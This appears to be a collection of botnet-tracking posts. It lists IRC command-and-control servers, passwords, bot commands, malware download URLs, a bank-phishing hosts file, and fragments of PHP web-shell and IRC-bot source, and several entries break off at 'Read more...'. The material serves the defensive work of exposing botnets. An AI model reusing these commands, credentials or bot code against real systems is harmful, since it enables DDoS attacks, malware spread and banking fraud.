Resolved techmanagement.info to 174.36.138.26 Andromeda Server: techmanagement.info Gate file: /image.php Plugins: Socks dl.dropbox.com/u/37821967/s.pack Hosting infos: http://whois.domaintools.com/176.31.208.106
tv.zabetwo.com(irc botnet hosted in China Hefei Chinanet Anhui Province Network)
Resolved : [tv.zabetwo.com] To [60.172.229.56] server: tv.zabetwo.com port:3324 PASS eee NICK lbaauf Channel #ng pass ng00 channel #us other channels:#!,#Ma,#i hosting infos: http://whois.domaintools.com/60.172.229.56
178.18.19.153 (irc botnet hosted by United States United Fibermax Networks Bv)
Server: 178.18.19.153 Port: 6969 Channel: #iRoot Opers: Rogue, Boss Nick Format: [Break-BoT-XP-USA]935862 Usb spreading: [Break-BoT-XP-ARG]356431: [FeVeR-USB] Infected With a FeVeR F: Version command Rogue: @version [Break-BoT-XP-ESP]467870: ..:: iRooT Modded by Break: v1.0 -::.. UDP flood: Rogue @udp 199.101.48.142 80 0 25000 [Break-BoT-XP-ESP]467870: [UDP]: FeVeR Flooding 199.101.48.142, On TeH PoRT: 80, WiTH A MoFKN DeLaY Of:Read more...
irc.infctd.biz(irc botnet hosted in Sweden Stockholm Portlane Networks Ab)
Resolved : [irc.infctd.biz] To [46.246.93.77] server: irc.infctd.biz port:6667 NICK [skank]5926101 USER nxmnrwy 0 0 :[skank]5926101 USERHOST [skank]5926101 MODE [skank]5926101 -x JOIN #deneme101010 Now talking in #deneme101010Topic On: [ #deneme101010 ] [ !dl http://mgtrading.org/ddos.exe c:/ddos.exe 1 ]Topic By: [ voLwy ] hosting infos: http://whois.domaintools.com/46.246.93.77
sp.3p.kz(irc botnet hosted in Netherlands Haarlem Fiberring B.v.)
Resolved : [sp.3p.kz] To [87.255.51.229] server: sp.3p.kz port:5050 NICK n[USA|XP]0314676 USER x “” “x” 😡 JOIN #cash hosting infos: http://whois.domaintools.com/87.255.51.229
PitBull CreW StableScanner
Found these heckers today when looking for online users in one board files are encrypted but not hard to decrypt them here u go t: <html><head><title>/// Response CMD ///</title></head><body bgcolor=DC143C> <H1>Changing this CMD will result in corrupt scanning !</H1> </html></head></body> <?php if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ echo("Safe Mode of this Server is : "); echo("SafemodeOFF"); }Read more...
tuntu.info (ngr irc botnet hosted by United States Miami Servergrove)
Resolved tuntu.info to 69.195.198.208 Server: tuntu.info Port: 5487 Channel: #zrl Channel password: filtro * Topic for #zrl is: !mdns http://freebookclubs.com/thumb/demo/host.txt !up hxxp://www.cesarfelipe.com.br//wp-content/themes/sakura/upd.exe EC62971A5CE3FE7DB74BBA3E5D1568D6 * Topic for #zrl set by dexter at Sun Nov 11 17:11:54 2012 host.txt www.bbvabancocontinental.com 38.109.219.132 bbvabancocontinental.com 38.109.219.132 www.bbvacontinental.com 38.109.219.132 bbvacontinental.com 38.109.219.132 www.bbvacontinental.pe 38.109.219.132 bbvacontinental.pe 38.109.219.132 148.244.45.125 38.109.219.132 www.bn.com.pe 38.109.219.132 bn.com.pe 38.109.219.132Read more...
Autoit Survey Winlocker
I found this while looking at the files that the barracuda http bots were downloading. First screen CPA gateway The only survey leads to a parked domain, my computer is locked forever The winlocker is coded in autoit, so I decompiled it to an autoit script here: http://pastebin.com/ayK5QsVD The important parts are the three htmlRead more...
Multiple Barracuda http nets (hosted by Russian Federation Moscow Pallada Web Service Llc)
Urls are: r00kiehttp.no-ip.info rabbit801.no-ip.org drhawks.no-ip.org pooostealer.no-ip.org To see what command is currently being sent, just add this to the end of the domain: /bot.php?ip=0.0.0.0&os=Microsoft%20Windows%20xp&name=FBI-PC&id=Federal-Agent-1.3.3.7 The command will show up in plain text on the page. Hosting infos: http://whois.domaintools.com/37.0.123.113 One other on different hosting: watchshopper.no-ip.org/backup/ Hosting infos: http://whois.domaintools.com/91.217.178.192
58.225.75.155(100 linux bots hosted in Korea, Republic Of Seoul Hanaro Telecom Inc.)
i m pasting the whole script u have server and port inside <?php set_time_limit( 0 ); error_reporting( 0 ); ignore_user_abort(true); echo "Success!"; class pBot { var $using_encode = false; var $config = array( 'server' => '58.225.75.155', //server here (base64) 'port' => 9999, 'chan' => 'machine', //channel here (base64) DO NOT USE "#", "#lazy" = "lazy"Read more...